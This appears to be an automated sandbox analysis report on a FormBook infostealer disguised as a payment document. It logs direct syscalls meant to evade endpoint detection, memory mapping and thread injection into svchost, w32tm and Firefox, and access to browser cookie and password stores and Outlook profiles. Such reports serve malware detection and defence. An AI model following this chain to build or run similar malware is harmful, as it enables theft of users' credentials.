Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]	1_2_036357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]	1_2_036B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B97A9 mov eax, dword ptr fs:[00000030h]	1_2_036B97A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037037B6 mov eax, dword ptr fs:[00000030h]	1_2_037037B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]	1_2_036307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D7B0 mov eax, dword ptr fs:[00000030h]	1_2_0365D7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF78A mov eax, dword ptr fs:[00000030h]	1_2_036EF78A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]	1_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]	1_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]	1_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]	1_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]	1_2_03669660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]	1_2_03669660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]	1_2_03662674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]	1_2_0364C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]	1_2_0364E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]	1_2_03666620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705636 mov eax, dword ptr fs:[00000030h]	1_2_03705636
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]	1_2_03668620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]	1_2_0363262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03661607 mov eax, dword ptr fs:[00000030h]	1_2_03661607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]	1_2_036AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366F603 mov eax, dword ptr fs:[00000030h]	1_2_0366F603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]	1_2_03633616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]	1_2_03633616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]	1_2_03672619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]	1_2_0365D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]	1_2_0365D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]	1_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]	1_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036ED6F0 mov eax, dword ptr fs:[00000030h]	1_2_036ED6F0

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00940B62

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00912622
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0090083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0090083F
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_009009D5 SetUnhandledExceptionFilter,	0_2_009009D5
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00900C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00900C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\w32tm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\w32tm.exe

Thread register set: target process: 7976

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\w32tm.exe

Thread APC queued: target process: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AE8008

Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

0_2_00941201

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00922BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00922BA5

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0094B226 SendInput,keybd_event,

0_2_0094B226

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_009622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_009622DA

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

0_2_00940B62

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00941663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00941663

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963336147.0000000001070000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963336147.0000000001070000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963336147.0000000001070000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00900698 cpuid

0_2_00900698

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00958195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00958195

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0093D27A GetUserNameW,

0_2_0093D27A

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0091BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0091BB6F

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008E42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\w32tm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: WIN_81
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: WIN_XP
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 